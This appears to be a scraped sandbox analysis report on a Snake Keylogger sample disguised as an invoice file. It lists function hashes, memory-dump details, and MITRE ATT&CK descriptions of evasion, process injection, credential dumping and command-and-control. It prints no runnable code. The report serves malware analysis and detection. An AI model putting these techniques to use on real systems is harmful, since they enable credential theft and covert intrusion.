Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 2a3123119d6586e7eccb6dee4973e7e32173fb55afba3bd542e709547aeb75f1
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 68C0127B10C5282AA225504E7C41AA3AA4CC2C12B4A250137F91CD324158425C4041A4

Uniqueness

Uniqueness Score: -1.00%

Function 0281A76D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70d525b952bd9b5ed087069f7f6e50636e2f638285e107f122b24c7ce89e361
Instruction ID: 9f4b93a4b50b2a660bbf06b268189b965c5d10e18f4309510bc189966898d11a
Opcode Fuzzy Hash: c70d525b952bd9b5ed087069f7f6e50636e2f638285e107f122b24c7ce89e361
Instruction Fuzzy Hash: 69D0677BB410189FCF049F98E8408DDBBB6FB9C221B048516E915E3261C6319921DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02815F00 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12252bb5950a92549353867f5b636653a992758806aaaf6cc12bc2dec6457dc
Instruction ID: a52db824c929e52b376d85a6348f648b49b60272ea861d8b4d9ca7819312f8dc
Opcode Fuzzy Hash: c12252bb5950a92549353867f5b636653a992758806aaaf6cc12bc2dec6457dc
Instruction Fuzzy Hash: EFD05B749483864FC74AFF30F5158143B39FFC1308B9049A5E8190A55AFB7E4E4AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02815F10 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c926916a9d551ff3fd6c92890dd3e1f4d0afba0883a72b8ab2c3f8cefe8970
Instruction ID: c6f153bf9e4ab0225efa001a96c1395131623e9954e16274578fed16615a0e5f
Opcode Fuzzy Hash: 29c926916a9d551ff3fd6c92890dd3e1f4d0afba0883a72b8ab2c3f8cefe8970
Instruction Fuzzy Hash: 94C012345443494BC64DFB75FA45D55371EEAC0304F908D20B40A0612DEF7A594A86A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0281223B Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

Xaq, xrefs: 0281236C
Xaq, xrefs: 02812266
Xaq, xrefs: 028122A0
Xaq, xrefs: 0281231F

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: e14477604d0a9b088dd50cf49a33660c63da51751cc90990409c48db4b727e01
Instruction ID: 3c7f1ec5a001d00078104b8bf1e5821d3352e1d4d2c5abeabe00ac547732f145
Opcode Fuzzy Hash: e14477604d0a9b088dd50cf49a33660c63da51751cc90990409c48db4b727e01
Instruction Fuzzy Hash: 8491A67EE0032A8BCB564FB4C95439AB7B9FF65310F0548E4C90AD62DADB704E99CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0669E5D8 Relevance: 5.1, Strings: 4, Instructions: 128COMMON

Download Yara Rule

Strings

Xaq, xrefs: 0669E63D
Xaq, xrefs: 0669E70B
Xaq, xrefs: 0669E6C3
Xaq, xrefs: 0669E609

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: 1a1492155d4786426998cff19fdd354410e6e0ef4a8df6f4d2725b643ded0d3c
Instruction ID: 217bddd65b10466b95041d229cb74379fa251a04e37f03e42386bbc1e4542c32
Opcode Fuzzy Hash: 1a1492155d4786426998cff19fdd354410e6e0ef4a8df6f4d2725b643ded0d3c
Instruction Fuzzy Hash: 6941F935E4011A8BDFB8CA69C94077EB6ADAF84310F110175CD26E7381EA71DD82DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0669E5D7 Relevance: 5.1, Strings: 4, Instructions: 91COMMON

Download Yara Rule

Strings

Xaq, xrefs: 0669E63D
Xaq, xrefs: 0669E70B
Xaq, xrefs: 0669E6C3
Xaq, xrefs: 0669E609

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: fc6ddff92d7e7baee7e817b0466a2434e94db7232d5e5ec91fec2330f2f6c831
Instruction ID: cc3e65cf31fb6535b4d4a7187fc7a91ae5a43f047c294a248a5284a2d704777d
Opcode Fuzzy Hash: fc6ddff92d7e7baee7e817b0466a2434e94db7232d5e5ec91fec2330f2f6c831
Instruction Fuzzy Hash: 74319635E4011B4BDF78CA69C94077FA6AAAF94300F150075CD1AE7785EA31DD82DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028160E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 028160FE
\;]q, xrefs: 02816126
\;]q, xrefs: 028160F4
\;]q, xrefs: 0281611A

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 340ac1638823cc6ec74853ac921987fb2901bf9c9bd0960e91150867b4139c87
Instruction ID: 60b7f3a9f2259c906312c3e09553d17ea0473f8a3549e9b062d978d910a3febb
Opcode Fuzzy Hash: 340ac1638823cc6ec74853ac921987fb2901bf9c9bd0960e91150867b4139c87
Instruction Fuzzy Hash: 1801843DB401298FCB649E2DC490A2577EFBF89A647254569E48ACB3F2EB31DC41C790

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FATURA VE BELGELER..exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FATURA VE BELGELER..exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
FATURA VE BELGELER..exe

Function 06CCDF5C Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Function 06CCDF68 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 028AAE90 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Function 05030BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 028A449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 028A590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Function 028AD421 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Function 06CCDCD8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 06CCDCE0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 028ACA00 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre